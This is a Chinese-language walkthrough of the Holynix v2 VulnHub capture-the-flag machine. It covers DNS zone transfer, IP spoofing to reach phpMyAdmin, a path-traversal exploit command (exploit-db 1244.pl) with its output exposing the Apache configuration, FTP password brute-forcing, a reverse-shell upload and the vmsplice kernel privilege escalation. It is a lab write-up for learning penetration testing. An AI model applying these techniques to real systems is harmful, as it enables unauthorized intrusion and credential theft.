CTF靶场系列-Holynix_v2 – 作者:陌度

下载地址

https://download.vulnhub.com/holynix/holynix-v1.tar.bz2

实战演练

这个靶机ISO加载之后,发现扫不了IP,需要修改了一下MAC地址

image.png

信息收集

发现靶机的IP是192.168.188

image.pngimage.png我们先从80端口入手

image.png

没有扫到有用信息

image.png

注入GG

image.png

在首页看到有提示到两个DNS服务器的地址,还有53端口开启,我们来看看这个端口有什么信息

image.png192.168.1.88 是ns1.zincftp.com主要的服务器

这里面涉及到DNS区域传送

image.png

我们将kali的IP地址修改为192.168.1.89

image.png现在本地作为ns2.zincftp.com的DNS服务器,我们尝试进行DNS区域传输

image.png看到一堆子域名,想着可以提取这些子域名做字典去爆破端口

image.png还有一个有特别的地方

mta.zincftp.com.	38400	IN	A	10.0.192.48

trusted.zincftp.com.	38400	IN	A	192.168.1.34

trusted好像是一个可信的区域,我们修改成这个IP,重新扫描web服务器试试

image.png

扫描出phpmyadmin

image.png这是可信到爆炸啊,密码都不设置

image.png修改DNS解析文件

image.pngimage.png查找信息

一些邮箱信息

image.png还有刚刚我们dirb扫描到phpmyadmin的修改日志

image.png

根据更改日志,它运行的是2.6.4版本,这是一个非常旧版本的phpMyAdmin。

我们搜搜有没有这个版本的漏洞

image.png试一下那个目录泄露的漏洞

image.png获取apache的配置文件

root@kali:/usr/share/exploitdb/exploits/php/webapps# perl 1244.pl http://zincftp.com /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default | head -n 50

ATTACK HOST IS: http://zincftp.com

HTTP/1.1 200 OK
Date: Sat, 02 Mar 2019 19:46:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Connection: close
Content-Type: text/html

NameVirtualHost *

<VirtualHost *>
	DocumentRoot /var/www/htdocs/
	ServerName www.zincftp.com

	<Directory />
		Options FollowSymLinks
		AllowOverride None
	</Directory>
	<Directory /var/www/htdocs/>
		Options Indexes FollowSymLinks MultiViews
		AllowOverride None
		Order allow,deny
		allow from all
	</Directory>

	<Directory "/var/www/htdocs/phpMyAdmin/">
		Options Indexes FollowSymLinks MultiViews
		AllowOverride all
		Order Deny,Allow
		Deny from all
		Allow from 127.0.0.1
		Allow from 192.168.1.34
	</Directory>
	<Directory "/var/www/htdocs/setup_guides/">
		Options Indexes FollowSymLinks MultiViews
		AllowOverride all
		Order Deny,Allow
		Deny from all
		Allow from 127.0.0.1
		Allow from 192.168.1.34
	</Directory>
	ServerSignature On
</VirtualHost>

<VirtualHost *>
	DocumentRoot /home/lsanderson/web/
	ServerName lsanderson.zincftp.com


找到这个<Directory “/var/www/htdocs/setup_guides/”>

image.png

添加用户指南

image.png注意到这个路径 

update /etc/pure-ftpd/pureftpd.passwd file

继续使用poc查看FTP密码

image.png使用字典进行爆破,我使用这个字典

http://www.mediafire.com/file/lurtcr5e48ybbkb/10_million_password_list_top_1000000.txt.gz

image.png爆破到一个用户密码,我们用这个登录FTP,然后把反弹shell给put上去

image.png我为什么要上传shell到FTP服务器呢?这是因为他的内容是基于FTP的web路径下的文件

image.png#poc

Linux Kernel 2.6.17 <= 2.6.24.1 – ‘vmsplice’ 5092.c

下载poc到靶机哪里

image.png提权成功

image.png

来源:freebuf.com 2019-03-02 23:26:22 by: 陌度

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论